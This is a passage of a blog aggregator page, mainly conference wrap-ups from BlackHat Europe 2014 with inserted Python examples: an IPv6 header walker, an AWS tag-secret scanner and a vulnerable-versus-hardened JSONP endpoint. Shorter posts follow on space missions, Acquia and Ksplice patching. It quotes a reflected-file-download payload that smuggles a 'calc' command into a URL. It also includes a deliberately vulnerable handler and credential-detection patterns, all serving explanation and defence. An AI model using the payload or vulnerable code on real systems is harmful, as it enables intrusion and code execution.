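            hlen = (packet[offset + 1] + 1) * 8  # options/routing length in 8-octet units minus 1
        if offset + hlen > end:
            anomalies.append(f"truncated {EXT_NAMES[nh]} header")
            return ChainReport(chain, None, anomalies)
        chain.append(nh)
        if nh == HOPOPT and offset != 40:
            anomalies.append("Hop-by-Hop header not immediately after the IPv6 header")
        if nh == FRAGMENT:
            frag_offset = struct.unpack("!H", packet[offset + 2:offset + 4])[0] >> 3
            if frag_offset != 0:
                # Non-initial fragment: the headers that follow live in the first fragment,
                # so the upper-layer protocol cannot be decided from this packet alone.
                _check_counts_and_order(chain, anomalies)
                return ChainReport(chain, None, anomalies)
        nh, offset = packet[offset], offset + hlen
    _check_counts_and_order(chain, anomalies)
    return ChainReport(chain, nh, anomalies)


def build_packet(chain: List[int], upper: int = 6, frag_offset: int = 0) -> bytes:
    """Constructed test packet (all-zero addresses) with minimal 8-byte bodies for
    Hop-by-Hop, Destination Options, Routing and Fragment headers."""
    next_headers = chain + [upper]
    body = b""
    for hdr, nxt in zip(chain, next_headers[1:]):
        if hdr == FRAGMENT:
            body += bytes([nxt, 0]) + struct.pack("!HI", frag_offset << 3, 0x1234)
        elif hdr == ROUTING:
            body += bytes([nxt, 0, 0, 0, 0, 0, 0, 0])  # type 0, no segments left
        else:
            body += bytes([nxt, 0, 1, 4, 0, 0, 0, 0])  # one PadN option
    body += b"\x00" * 20                               # dummy upper-layer payload
    fixed = struct.pack("!IHBB", 6 << 28, len(body), next_headers[0], 64)
    return fixed + b"\x00" * 32 + body


if __name__ == "__main__":
    for sample in ([HOPOPT, DSTOPTS, FRAGMENT], [FRAGMENT, HOPOPT, HOPOPT]):
        print(walk_extension_headers(build_packet(sample)))
```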

The next talk was chosen purely by curiosity: “Gyrophone – Recognizing speech from gyroscope signals” by Yan Michalevsky, Gabi Nakibly and Dan Boneh.

Gaby & Ivan on stage

How to record speech without using the built-in microphone? All smartphones have a small device called a gyroscope. To record speech on a mobile device, the main problem for an attacker is how to access the microphone because the access must be approved by the user. But sensors can be freely accessed by apps like… the gyroscope! Why? Because it is not considered a security or privacy threat. The gyroscope can be accessed from browsers using a simple piece of JavaScript code. There are two major vendors on the market but they both work in the same way. Gyroscopes are very sensitive to acoustic noise. To sum up: our voice makes waves which generate vibration. They impact the gyroscope!

Impact of speech against a gyroscope

Based on this fact, gyroscopes are (lousy but still) microphones! The sample rate of the gyroscope is limited by the OS (max 200Hz). To give you an idea, male speech is around 85-180Hz and female speech around 165-244Hz. Listening at 200Hz is not efficient but algorithms can be used to perform a deeper analysis for us. That’s what the speaker explained during the rest of the talk. They described the lab they put in place to record enough samples and the different techniques used to:

Depending on the samples and techniques, the results varied but they also demonstrated how the detection rate could be improved by using multiple devices sampling at the same time. Some other attacks:

What are the defences against this attack? A range of 0-20Hz should be enough for most applications to sample the gyroscope. Higher ranges should be allowed only to trusted applications (like the microphone). The idea was very good but, after the theory, I would have expected some demos.

After a first coffee break, let’s continue with “Revisiting XSS sanitisation” by Ashar Javed. More precisely, the talk focused on WYSIWYG editors like those we can find in thousands of websites such as forums, CMS (blogs) but also more corporate applications like ticketing systems. They allow you to generate nice content by inserting pictures, bold and italic text, links etc. Froala is a very common editor used by many websites. Imagine a major vulnerability in this editor: you have a very broad attack surface! And developers of such editors are proud to claim they have thousands of customers! Another example is TinyMCE, used by WordPress (that I’m using right now to write this post). What to say about XSS? As Ashar said: “They were there, they are and they will be!”

Ashar on stage

Ashar reviewed some examples of XSS vulnerabilities he found in text editors. He received some money from bug bounty programs for this but he was also banned or had his account disabled on some sites. Ashar explained step by step, in a very didactic way, how he successfully abused so many websites which rely on third-party libraries or code. He started with an XSS based on width:expression on IE7 and switched also to other browsers. What are the common injection points in WYSIWYG editors:

Ashar reviewed all of them, always with good examples. He also provided some nice slides which explain how to quickly find XSS using common browsers. The presentation ended with a question: “Why are all WYSIWYG editors vulnerable?”. According to Ashar, the answer is based on two components: transfer of responsibility and laziness. Developers think that it’s up to the site owner to take care of data received from the client, and webmasters rely on 3rd party code that should block all such kinds of attacks. Finally, some tips were given to efficiently block XSS attacks. To prove this, Ashar started a project and asked people to break into his application. As of today, 82K (!) attacks were executed against the webpage and none succeeded. A last message to developers: if XSS attacks are hard to block, don’t forget to use httpOnly cookies to prevent them from being stolen!

The last half-day started with Erik Peterson who presented “Bringing a machete to the Amazon”.

Erik on stage

Forget all the *AAS abbreviations! From a single perspective: “A cloud like AWS is an operating system”. It has memory, disk and allows you to run applications. Cloud infrastructure is code. Traditional applications are a small part of the whole system (Java, .Net, etc) and the majority of the system is provided by AWS. And like any application, after a few months, it can become a mess if not properly managed. Forklifting is also dangerous. Forklifting is the process of taking legacy data centre applications and loading them into the cloud. This can be expensive and dangerous:

Emergent security: an individual component can be secure but, once placed in the cloud, the system becomes insecure. Example: Internet weather – some datacenters can be subject to unpredictable, non-persistent network latency issues. This is very similar to the DevOps concept. “In the cloud, the king of the jungle is the API”. API keys are the key to your security. Impact?

APIs can bypass classic security controls: you have an IPS and a FW? The API can snapshot your VM, mount the snapshot on another VM and extract info. How to get access to the API? Via GitHub of course! Search for “SECRET_ACCESS_KEY“. What about an API honeypot? Your keys will be stolen in less than 60 mins! :) What about cloud metadata? They contain useful info like startup scripts and AWS access credentials. Not only AWS but all cloud providers have it (except Azure ;-). There is nothing wrong with metadata … as long as you are aware of them and protect them. Old vulnerabilities, new life thanks to the AWS cloud. Ex: CWE-77 (command injection). Control access to the API and restrict access based on IP, but it does not solve the problem! Your bill is not an IDS: “Wow, I got a big bill, something wrong must be happening” ;-) Implement API logging, by default it’s off! Turn on CloudTrail and use Logstash (as an example). DevOps culture tends to “fail open”. Developers are new to the cloud. Their goal is “just to make it work”. Leaking tags! Tags are very nice to keep information (ex: owner of the machine, contacts, …) but please don’t put your password or API key inside tags! Back to the title of the presentation: Machete is a tool to:
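As an added example (not Erik’s Machete tool), a small Python scan over an EC2-style tag inventory that looks for the “leaking tags” problem described above: AWS key IDs or secret-shaped high-entropy strings inside tag values, and tag names that suggest credentials. The inventory is constructed; the credential-shaped values are the placeholder examples from the AWS documentation, not real keys.

```python
import math
import re
from typing import Dict, List, Tuple

# Shapes of AWS credentials: key IDs start with AKIA (long-term) or ASIA (temporary) followed
# by 16 upper-case alphanumerics; secret keys are 40 characters of base64-like text.
ACCESS_KEY_ID = re.compile(r"\b(?:AKIA|ASIA)[0-9A-Z]{16}\b")
SECRET_CANDIDATE = re.compile(r"(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])")
SENSITIVE_TAG_NAME = re.compile(r"secret|passw|api[_-]?key|token|credential", re.IGNORECASE)
MIN_SECRET_ENTROPY = 3.0  # bits per character; a real 40-char random secret is well above this

Finding = Tuple[str, str, str]  # (resource id, tag key, reason)


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character, used to separate random secrets from ordinary words."""
    if not text:
        return 0.0
    probs = [text.count(c) / len(text) for c in set(text)]
    return -sum(p * math.log2(p) for p in probs)


def scan_tags(resource_id: str, tags: Dict[str, str]) -> List[Finding]:
    """Return one finding per reason for every tag whose key or value looks like a credential."""
    findings: List[Finding] = []
    for key, value in tags.items():
        if ACCESS_KEY_ID.search(value):
            findings.append((resource_id, key, "aws_access_key_id_in_tag"))
        if any(shannon_entropy(m.group(0)) >= MIN_SECRET_ENTROPY
               for m in SECRET_CANDIDATE.finditer(value)):
            findings.append((resource_id, key, "possible_aws_secret_key_in_tag"))
        if SENSITIVE_TAG_NAME.search(key):
            findings.append((resource_id, key, "sensitive_tag_name"))
    return findings


def scan_inventory(inventory: Dict[str, Dict[str, str]]) -> List[Finding]:
    """Scan a {resource id: {tag key: tag value}} mapping, e.g. flattened describe-instances output."""
    return [f for rid, tags in inventory.items() for f in scan_tags(rid, tags)]


# Constructed inventory; the credential-shaped values are the placeholder examples used in the
# AWS documentation, not real keys.
SAMPLE_INVENTORY = {
    "i-0123456789abcdef0": {"Name": "web-01", "Owner": "ops@example.org"},
    "i-0fedcba9876543210": {"Name": "batch-02",
                            "Notes": "key AKIAIOSFODNN7EXAMPLE / wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"},
    "i-00000000deadbeef0": {"Name": "legacy", "db_password": "hunter2"},
    "i-0000000000000feed": {"Name": "noisy", "Comment": "a" * 40},  # long but low entropy
}

if __name__ == "__main__":
    for finding in scan_inventory(SAMPLE_INVENTORY):
        print(*finding)
```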

Other tools that could be interesting:

Very nice presentation but the introduction to the AWS cloud and the associated risks was a bit long (IMHO). I’d have expected some nice demos of Erik’s tool.

The next presentation was dedicated to the new OS X version, version 10.10 called “Yosemite”. Good synchronisation, it was just released yesterday. This version was already available to developers (and security researchers). It was reviewed, from a security point of view, by Ming-chieh Pan and Sung-ting Tsai.

Sung-ting & Ming-chieh on stage

They analysed the changes implemented by Apple in the new version of their operating system and reported their findings. They started with a review of the rubilyn root-kit publicly released 2 years ago. Then they reviewed how to install (offensive) and detect (defensive) a root-kit on the new version of OS X. A good idea was to present all the examples (system calls) alongside their Windows equivalents (most people have more knowledge of the Microsoft environment). The talk was very technical and above my knowledge, very difficult to follow but, according to a friend, it was good. Finally, they presented their tool called SSV-X (“System Virginity Verifier”), especially adapted to OS X.

And the second day finished for me with “Reflected file download – A new web attack vector” by Oren Hafif. After a funny introduction about himself, Oren explained in detail what RFD is and what is behind this attack. The presentation focused on the objectives of RFD and understanding how it works. Both defenders and attackers are concerned: how to detect and report it, but also how to prevent it. calc.exe:

calc.exe, the security researcher's best friend

The attack is quite straightforward: a user clicks on a valid link, a malicious file gets downloaded from google.com, and the file executes immediately once clicked. The key in this attack is: how do we trust downloads and how do we trust websites? For example, we trust online banking websites because they have a lot of locks on the page, they use HTTPS, the URL bar is green, etc… Four out of five people will trust a download based on the domain! Based on the Google autocomplete feature, Oren explained step by step how this attack works, starting from a simple ‘rfd‘ search string up to ‘s;.setup.bat/?q=rfd”||calc||‘. This attack also abuses a silly browser behaviour which allows files containing “install”, “setup” or “update” in the filename! An advanced attack could be to use PowerShell to download the rest of the payload. It will ask for admin rights, but using the standard dialog box that people trust, of course! Finally, Oren reviewed some ways to fix this issue:

In the meantime, Google fixed the issue but, according to Oren, there are tons of vulnerable websites online! Very nice presentation which, I’m sure, gave lots of ideas to the pentesters present in the room!
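As an added illustration (not Oren’s material or Google’s fix), a minimal JSONP-style search endpoint in Python, shown as the vulnerable “before” handler next to a hardened one: the callback is restricted to a plain identifier, the response carries a Content-Disposition with a fixed filename so the URL path can no longer choose the name of the download, and nosniff is set. Function names and the filename are assumptions for this example.

```python
import json
import re
from typing import Dict, Tuple

Response = Tuple[int, Dict[str, str], str]  # (status, headers, body)

# A JSONP callback may only be a plain JavaScript identifier; anything else is rejected.
SAFE_CALLBACK = re.compile(r"^[A-Za-z_$][A-Za-z0-9_$]{0,63}$")


def vulnerable_search_api(callback: str, q: str) -> Response:
    """'Before' handler (constructed): the callback is reflected verbatim and no download
    filename is set, so if the browser saves the response the URL path decides its name."""
    body = callback + "(" + json.dumps({"results": [q]}) + ");"
    return 200, {"Content-Type": "application/json"}, body


def hardened_search_api(callback: str, q: str) -> Response:
    """Same endpoint with the RFD countermeasures applied."""
    if not SAFE_CALLBACK.match(callback):
        return 400, {"Content-Type": "text/plain"}, "invalid callback"
    body = callback + "(" + json.dumps({"results": [q]}) + ");"
    headers = {
        "Content-Type": "application/json; charset=utf-8",
        # Fix the file name and extension for any download of this response, so the path
        # of the request can no longer turn it into something like setup.bat.
        "Content-Disposition": 'attachment; filename="results.json"',
        # Stop the browser from guessing a different content type from the body.
        "X-Content-Type-Options": "nosniff",
    }
    return 200, headers, body


if __name__ == "__main__":
    print(vulnerable_search_api("calc||", "rfd"))
    print(hardened_search_api("calc||", "rfd"))
    print(hardened_search_api("cb", 'rfd"||calc||'))
```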

Next to the classic briefings, there was also an Arsenal session organized by Netpeas and Toolswatch with very interesting tools. Don’t hesitate to have a look at them:

That’s it for this edition of BlackHat! I only attended 25% of the scheduled talks and, in my selection, some were excellent, others less so, but a broad scope was covered. Two remarks about the organization: change your WiFi and catering providers ;-)

Game over!


by Xavier at October 17, 2014 08:27 PM

October 16, 2014

Paul Cobbaut

space

It takes a small effort to keep up to date on space news. Here's a summary of some current space flights that I like.


New Horizons
In 2015 we will see Pluto (a dwarf planet) for the very first time. This is the best picture we have of Pluto today:

New Horizons should improve this picture gradually from February to August 2015, yeah!

Dawn
Remember Ceres, the dwarf planet between Mars and Jupiter? Only 900km across, yet it could have more fresh water than planet Earth, and it holds about a third of the mass of the asteroid belt. Dawn will give us a first look at Ceres in February 2015, yeah!


China to the Moon
Many people laugh at the Chinese space program; they shouldn't! They launched Chang'e 3 to the Moon in December 2013, and released a rover that is still operational today. Never mind that it stopped driving in January 2014, having a bunch of instruments operate for more than 10 months at -150 and +100 degrees Celsius is *amazing*.
Chang'e 4 will launch 23 October 2014 to fly to the Moon and back, testing return to Earth. Chang'e 5 will collect some rocks from the Moon in 2015 and fly them back to Earth. How long will it take before they send people?
My guess is they won't just plant a flag, they will go to the Moon to do real long term science.


Elon Musk
Elon Musk is a man with a clear vision. He wants to put a million people on Mars as soon as possible. He is currently in charge of SpaceX (and also CEO of Tesla). They already had four or five flights to the International Space Station with their own rockets and their own spacecraft. My best guess is that they will have an unmanned Mars landing in about six years, and manned around 2025-ish.


There is more:
-Rosetta (circling a comet!) with Philae
-Juno

-the Chinese space station (construction from 2018 till 2022-ish)
-the American rovers on Mars
-lots of satellites around Mars
-and the Voyager probes are still alive

by Paul Cobbaut (noreply@blogger.com) at October 16, 2014 06:37 PM

Xavier Mertens

BlackHat Europe 2014 Wrap-Up Day #1

BlackHat is back in Amsterdam and here is my wrap-up for the first day. It rained all the way to Amsterdam this morning but that did not prevent motivated people from joining the Amsterdam RAI, where this 2014 edition of BlackHat Europe is organised! They moved from the center of the city to a bigger conference center. Nice place, but far away from bars and restaurants. After the classic registration process and a nice breakfast, let’s go with today’s talks. As usual, Jeff Moss opened the conference with some facts about the event. Interesting: this year 50% of the audience is coming for the first time! Fresh blood is always good. People came from 68 different countries (eg Brazil, Surinam, Ukraine, …). Jeff’s message was also: feel free to ask questions, participate and learn… The community is very important.

The day started with Adi Shamir’s keynote and some crypto. Ouch, crypto is hard to start a day with but, after some theory, funny stuff was explained. Adi is currently the Borman Professor of Applied Mathematics at the Weizmann Institute of Science and his main area of research is cryptography. He is a co-inventor of the RSA algorithm. In short, he’s the “S” of RSA!

Adi on stage

Today, writing papers about mathematical cryptanalysis is getting easier because we have many more targets to attack and more tools. But the definition of success has also changed: it’s not only finding the secret key but distinguishing the output of a system from garbage. On the other side, it’s also getting harder to get a practical impact: mathematical attacks have forced practitioners to dump ciphers. For years, we have seen examples of attacks against crypto: DES, WEP, MD5/SHA1, etc… Then Adi came back to one of the simplest side-channel attacks: power analysis. The goal is to check the fluctuations of the power consumed by a device when it performs crypto operations. Can we use this technique to break the RSA scheme? Can we compare the curves recorded while doing mathematical operations? A paper was published at CRYPTO 2014: RSA key extraction by listening to a computer. The question which then comes is: how effective are TEMPEST protections? Adi started to work on new research: long-range bi-directional communication with an air-gapped computer system containing only untampered hardware. I played with this for the last few weeks. Imagine a nice building (a pentagon) with many secrets. B. Schneier suggested using an air gap to protect from the NSA. Really? First, the hardware solution is to install a mini-transmitter in the device. This requires just one-time access to the device. Simple but very intrusive! And what about a software solution? In this case, again we need one-time access to the machine to plant malware (via a USB stick, a phishing campaign, …). But once done, how to “talk” to the planted malware? That’s the “holy grail” of cyber-attacks: how to communicate with this device in an inaccessible location, let’s say 1200m away from the target. Challenge accepted by Adi! Using a simple scanner/printer and one flashlight, Adi explained how we can send data to the printer by flashing the light with specific sequences.
The next step was to test the same from far away with a laser. Adi wrote an application to program the laser to send messages. A possible attack scenario is the following: the malware initiates a scan at a certain time, gets the scanned image and interprets it. But this can be very suspicious. Otherwise, let the victim scan a real document and use the lines from the edges! But what about exfiltration of data? How to use the printer in the reverse direction? The attacker can pick up the scanning light emanating at night from the dark room. This is very slow. To improve the view of the printer, Adi used a drone to record the lights from a higher position. In conclusion, they called the new technique “SCANGATE“. Take care of your all-in-one printers and, as countermeasures, use black curtains or put the devices away from any external lights. This was a very nice keynote; in practice the scenario is very difficult to implement in real life, but it makes you realize that attackers can have plenty of ideas!

BlackHat being a four-track conference, it is mandatory to make choices amongst the huge amount of interesting talks. The first one for me was a talk about Network Attached Storage (NAS) systems: “N.A.S.TY Systems that store network accessible shells” presented by Jacob Holcomb. A scary fact to start: 100% of systems tested were vulnerable… And recently, Qnap was found to be vulnerable to shellshock. Jacob’s proof-of-concept was to develop self-replicating code across devices. Many people / companies use NAS, so the attack surface is very big. Some key players: QNAP, Seagate, Netgear, D-Link, Buffalo. Classic configuration services are telnet, ssh, http but they also have an unnecessary service: a link to the “cloud”. 50% can be compromised without authentication and 22 CVE numbers were assigned by MITRE. Far worse than routers!

Jacob on stage

The testing methodology used by Jacob was classic: scanning, banner grabbing, investigating running services, analysing web applications, static code analysis and fuzzing. Different types of vulnerabilities were discovered: command injection, XSS, buffer overflow, lack of access control, info disclosure, backdoor, broken session management. Jacob gave some tips (countermeasures) for developers, such as using the available API instead of calling system(). If you don’t have an alternative, just allow expected commands, nothing else!

What about mass exploitation? Jacob performed a demo of his N.A.S.Ty worm… He focused on 3 targets: D-LINK DNS345, TRENDnet TN-200 / TN-2011T1 and WD MyCloud EX4, but others may be vulnerable too! How does it work?

  1. Scan for tcp/80
  2. Fingerprint
  3. Exploit
  4. Download & run the code
  5. Rinse and repeat

Jacob did a live demo of his worm against NAS devices located in the room. Once the worm infected a NAS, it kills itself and starts scanning for other victims from the newly infected NAS. Note that it does not check if the NAS is already infected. This means that more worms can run simultaneously and cause some kind of DoS (slow response, bandwidth usage). A special mention to the project “hack routers and get paid” (see sohopelesslybroken.com). What about the remediation? For the vendors: transparent patch management, add security checks, apply security principles (like least privilege). For consumers: harden your devices! The worm part was interesting but we already knew that devices like NAS have a very weak security maturity!

After a first coffee break, I was torn between SmartMeters and the “Internet of Things” stuff. As I had already attended presentations about SmartMeters in the past, I decided to follow Candid Wueest’s talk, called “Quantified self – A path to self-enlightenment or just a security nightmare”. Candid started with a definition of “quantified self”. Is it a new buzzword? The goal of those technologies is to record everything about your life (sleep cycles, calories, steps, heart beats etc…).

Candid on stage

Candid put some focus on fitness devices like the Fitbit wristband. This device records information via sensors and shares it with a computer (or mobile device). Data are also sent to the cloud to compute interesting statistics and share the data with the user’s friends. Basically, every additional hop the data makes (device, laptop/phone and finally cloud) also increases the risks. The first issue reported by Candid was the unintentional data leak, or the secret life of mobile applications. Amongst the different apps that were tested, they contacted on average 5 different domains and the winner contacted 14! Connections are used to exchange data with advertisement networks, the application provider, the OS provider, some social media, etc. Always verify the default settings of your application. A bad example is Fitbit, which once made “sexual activity” visible to all by default! Then, passive information can also be leaked. If an advertisement is displayed after the completion of an exercise, the traffic to the advertisement network can be used to detect when the user is doing some exercise. Health kits may contain PII (“Personally Identifiable Information”) but 52% of the tested apps do not have a privacy policy. Your data are already analysed today. Candid gave the example of the earthquake in San Francisco, where it was analysed who was asleep at that time. Worse, 20% of tested apps send HTTP POST requests in clear text. And, if they use SSL, they accept self-signed certificates and don’t check revocation lists. Some cloud applications are also very bad. Some allow user enumeration (“GET /api/user/xxx”), others implement an open relay via sendmail.php. The next part of the talk was dedicated to devices using Bluetooth Low Energy. It’s possible to scan for interesting devices and learn some information. As a proof-of-concept, Candid developed a “Blueberry Pi” based on a Raspberry Pi, a USB4 dongle and a portable battery.
When scanning sport events, you can collect plenty of data. He also scanned the BlackHat attendees but detected only 8 devices. The conclusion of this research? Your digital footprint will be (is already?) everywhere. Take care when using health devices: when not in use, turn off Bluetooth or the device itself, and keep them updated (which is also a challenge). Look for a vendor with a security policy. This was a nice talk with a different approach to the Internet of Things.

After lunch, Dan Koretsky talked about VDI (“Virtual Desktop Infrastructure”) with a presentation called “A practical attack against VDI solutions”, with more focus on mobile VDI solutions. What is VDI? The technology allows the user to have a remote desktop on any device, with three big advantages:

What are the threats with mobile VDI solutions? The first threat is directly related to “mRat” or “Mobile Remote Access Trojan” which records keystrokes (key-logger). With the help of Checkpoint, a lot of traffic was analysed and some interesting stats were grabbed:

Compromised mobile devices stats

The second threat is grabbing credentials locally on Android. The third one is screen scraping. This can be done using access to the clipboard (CTRL-A then CTRL-C) or screen recording. Finally, the fourth threat is playing a MitM attack. Nothing fancy in this presentation, nothing new; we already know that a solution like VDI is good as long as the end-point is not compromised. Finally, the last five minutes were more marketing with details about the solution developed by Dan’s company.

In a short presentation, Sergej Schumilo and Ralf Spennenberg presented their research called “Don’t trust your USB” or how to find bugs in USB device drivers? Do you remember Teensy? This small USB device was able to compromise a device by simulating a keyboard and sending keystrokes to the victim. But what’s the new motivation? To compromise a system via the USB bus. This research was done using massive usage of virtual machines with systematic and comprehensive fuzzing. The talk explained how to perform this task at a very high performance rate.

My next choice was “How I hacked your ATM with friend’s Raspberry Pi” presented by Alexey Osipov and Olga Kochtova. The topic looked interesting with a new way to use a Raspberry Pi computer. The presentation started with a small history of ATM’s. Did you know that the first ATM was installed in 1967 by Barclay’s bank? If at the beginning it was not seen as a revolution, today, we could not live without an ATM close to us to get some cash! That’s also why ATM’s are nice targets: they contain money.

Alexey & Olga on stage

Then the speakers explained their motivations behind this research. Banks are curious! Usually, the attack scenario starts with malware injected into the ATM thanks to physical access. It is injected using a USB stick or a CD-ROM. The best-known attack is Barnaby Jack’s “ATM Jackpotting”. There are also physical attacks (skimmers and PIN readers). But, how hard is it to get inside an ATM? The ATM has two major zones: a “service” zone where maintenance can be performed and where the computer is installed, and the “safe” zone where the money is stored. Usually, the service zone is protected by a plastic cover with a single lock. The safe zone is made of steel and concrete with rotary code or electronic locks and two types of locks. The next part of the talk was a description of the attack using a Raspberry Pi connected to the computer and remotely accessible. Once inside the ATM, a Raspberry Pi can be installed and connected to the USB bus (+ battery + wifi). They briefly explained how the attack was performed but without many details. The presentation made during the OWASP Belgium chapter in May was much more complete! Conclusion of this talk: the service zone is important and must be properly secured; current methods of protection are not enough. Here again, nothing brand new…

If I was a bit disappointed by the presentations that I followed in the afternoon, the last one of the day was the best one (IMHO). The last talk was “Firmware.RE – Firmware unpacking, analysis and vulnerability discovery as a service” by Jonas Zaddach.

Jonas on stage

The idea of this research started with another fact: embedded systems are everywhere! They can do a lot of things but it’s even more fun to make them talk to each other and even more to the Internet! (IoT). The classic types of embedded systems are routers, printers or VoIP systems. Jonas reviewed some nightmare stories (backdoors for routers and abusing PostScript with printers). And many many other devices… The problem is that analysing all those devices requires a lot of time. This can’t be performed manually. The idea of the research was to make a large-scale analysis to see if embedded systems suffer from the same vulnerabilities. But the problems with large-scale analysis are:

How to automate this?

The big advantage is that the analysis is non-intrusive, it can be performed online and it is very scalable, but many challenges remain! The first challenge is how to get the firmware? There are multiple sources and ways to get them. There was no large-scale firmware dataset available. They downloaded lots of firmware images but some of them were not available. The second challenge was firmware identification: how to detect firmware across thousands of files? How to reliably unpack it and learn formats? Example: upgrading a printer via a PS file, how to detect it as a firmware? The architecture they developed is based on a crawler which downloads and stores firmware in a DB. The firmware is sent to the cloud application for analysis (unpack, static analysis, fuzzy hashing). A password hash cracker is also available to crack found passwords. Everything is managed by a web interface. As of today, the crawler has already collected 759K files (1.8TB). From those files, 1.7M files were extracted! What were the common issues found:

The analysis system will be available to everybody and do not hesitate to submit your firmware. The tool is available at the following address: www.firmware.re (It will be publicly available soon after the conference). The first day was closed by a reception in the business corner where people did some networking. See you tomorrow for the second day!

by Xavier at October 16, 2014 05:43 PM

Dries Buytaert

Acquia a leader in Gartner Magic Quadrant for Web Content Management

You might have read that Acquia was named a leader in the Gartner Magic Quadrant for Web Content Management.

It's easy to underestimate the importance of this recognition for Acquia, and by extension for Drupal. If you want to find a good coffee place, you use Yelp. If you want to find a nice hotel in New York, you use TripAdvisor. Similarly, if a CIO wants to spend $250,000 or more on enterprise software, they consult an analyst firm like Gartner. So think of Gartner as "Yelp for the enterprise".

Many companies create their technology shortlist based on the leader quadrant. That means that Drupal has not been considered as an option for hundreds of evaluations for large projects that have taken place in the past couple of years. Being named a leader alongside companies like Adobe, HP, IBM, Oracle, and Sitecore will encourage more organizations to evaluate Drupal. More organizations evaluating Drupal should benefit the Drupal ecosystem and the development of Drupal.

by Dries at October 16, 2014 12:23 PM

October 15, 2014

Wim Coekaerts

Oracle Linux Containers and docker and the magic of ksplice becomes even more exciting

In my previous blog entries I talked about the value of Ksplice for applying updates and keeping a system current. The typical use case has been a physical server or a VM running some application, where each system stays pretty isolated. A sysadmin often sees downtime on a single server as no big deal, but downtime for a bunch of servers, because a multi-tier application goes down, is a pretty big deal for the application owner and can take some scheduling (and cost) to agree on a reboot window. If you have to patch a database server and reboot it, you first have to bring down the application servers, then bring down the database, then reboot the server. So the 'single reboot' from the sysadmin's point of view is a long outage and a real risk for the application owner whose application spans many servers. Do keep that complexity in mind...

We introduced support for Linux containers a year ago, with Oracle Linux 6 and the release of UEKr3; there was no need to wait for OL7 (or RHEL 7), no need to reinstall servers, move from 6 to 7 and take on systemd and other major changes. Simply updating an OL6 environment and rebooting into UEK3 was enough, a year ago. So... with containers (and Docker is very similar here) you run one kernel. That is unlike VMs, where each VM is a completely isolated virtual environment with its own kernel, and where you can live-migrate the VMs to another host when you need to update or patch the host. So you run an OS that supports containers, deploy your apps and isolate each of them nicely in a container... and then you need to apply kernel security updates. That means patching the host kernel on which all these containers run, and now my reboot brings down a ton of containers. Well, not with Ksplice. You run uptrack-upgrade in the host environment and it updates the running kernel online, to the latest fixes and CVEs, without affecting the apps running in their containers or Docker environments. Done. No downtime, no scheduling issues with your application users... all set.

Supported since a year ago. Stable.

by wcoekaer at October 15, 2014 09:27 PM

The magic of ksplice continues...

My previous blog entry talked about some cool use cases of Ksplice, using Oracle Linux 5 as the example. In this entry I just want to add Oracle Linux 6. For Oracle Linux 6 we go all the way back to the GA kernel of OL6: 2.6.32-71.el6, build date Wed Dec 15 12:36:54 EST 2010. We support Ksplice online updates from that point on, up to today. It is the same model: you can be on any Oracle Linux 6 kernel, an errata update, or the kernel of a specific update release like 6.1, ... 6.5, and get current with CVEs and critical fixes from then on. After running uptrack-upgrade, the effective kernel version is 2.6.32-431.29.2.el6.

I ran out of xterm buffer space ;-) so the output of uptrack-upgrade -y below starts at the Installing part:

Installing [1y0hqxq7] Invalid memory access in dynamic debug entry listing.
Installing [1f9nec9b] Clear garbage data on the kernel stack when handling signals.
Installing [lrh0cfph] Reduce usage of reserved percpu memory.
Installing [uo1fmxxr] CVE-2010-2962: Privilege escalation in i915 pread/pwrite ioctls.
Installing [11ofaaud] CVE-2010-3084: Buffer overflow in ETHTOOL_GRXCLSRLALL command.
Installing [8u4favcu] CVE-2010-3301: Privilege escalation in 32-bit syscall entry via ptrace.
Installing [ayk01zir] CVE-2010-3432: Remote denial of service vulnerability in SCTP.
Installing [p1o8wy3o] CVE-2010-3442: Heap corruption vulnerability in ALSA core.
Installing [r1mlwooa] CVE-2010-3705: Remote memory corruption in SCTP HMAC handling.
Installing [584zm6x2] CVE-2010-3904: Local privilege escalation vulnerability in RDS sockets.
Installing [vt03uggp] CVE-2010-2955: Information leak in wireless extensions.
Installing [7rzgltfi] CVE-2010-3079: NULL pointer dereference in ftrace.
Installing [oyaovezn] CVE-2010-3437: Information leak in pktcdvd driver.
Installing [70cjk1y6] CVE-2010-3698: Denial of service vulnerability in KVM host.
Installing [9dm5foy9] CVE-2010-3081: Privilege escalation through stack underflow in compat.
Installing [mhsn7n2j] Memory corruption during KSM swapping.
Installing [kn5l6sh5] KVM guest crashes due to unsupported model-specific registers.
Installing [xmx98rz9] Erroneous merge of block write with block discard request.
Installing [23nlxpse] CVE-2010-2803: Information leak in drm subsystem.
Installing [mo9lbpsi] Memory leak in DRM buffer object LRU list handling.
Installing [91hrmhbr] Memory leak in GEM drm_vma_entry handling.
Installing [apryc0uo] CVE-2010-3865: Integer overflow in RDS rdma page counting.
Installing [ur02tbrc] CVE-2010-4160: Privilege escalation in PPP over L2TP.
Installing [5o3hvdgy] CVE-2010-4263: NULL pointer dereference in igb network driver.
Installing [a3z3nda1] CVE-2010-3477: Information leak in tcf_act_police_dump.
Installing [lsd1hzvx] CVE-2010-3078: Information leak in xfs_ioc_fsgetxattr.
Installing [z92iokkb] CVE-2010-3080: Privilege escalation in ALSA sound system OSS emulation.
Installing [23yh7u1i] CVE-2010-3861: Information leak in ETHTOOL_GRXCLSRLALL ioctl.
Installing [jxtltpyu] CVE-2010-4163 and CVE-2010-4668: Kernel panic in block subsystem.
Installing [5fuyrpx3] CVE-2010-4162: Integer overflow in block I/O subsystem.
Installing [ylkgl75m] CVE-2010-4242: NULL pointer dereference in Bluetooth HCI UART driver.
Installing [ppawlabm] CVE-2010-4248: Race condition in __exit_signal with multithreaded exec.
Installing [q4n7w8t6] CVE-2010-3067: Information leak in sys_io_submit.
Installing [0w2s15ix] CVE-2010-3298: Information leak in hso_get_count().
Installing [dfi8ncbj] CVE-2010-3876: Kernel information leak in packet subsystem.
Installing [ahrdouix] CVE-2010-4073: Kernel information leaks in ipc compat subsystem.
Installing [wvbjfli8] CVE-2010-4074: Information leak in USB Moschip 7720/7840/7820 serial drivers.
Installing [pkhcqtro] CVE-2010-4075: Kernel information leak in serial subsystem.
Installing [cwksn40u] CVE-2010-4077: Kernel information leak in nozomi driver.
Installing [q4d3smds] CVE-2010-4079: Information leak in Conexant cx23415 framebuffer driver.
Installing [z4duwd7q] CVE-2010-4080 and CVE-2010-4081: Information leaks in sound drivers.
Installing [eajqjo74] CVE-2010-4082: Kernel information leak in VIAFB_GET_INFO.
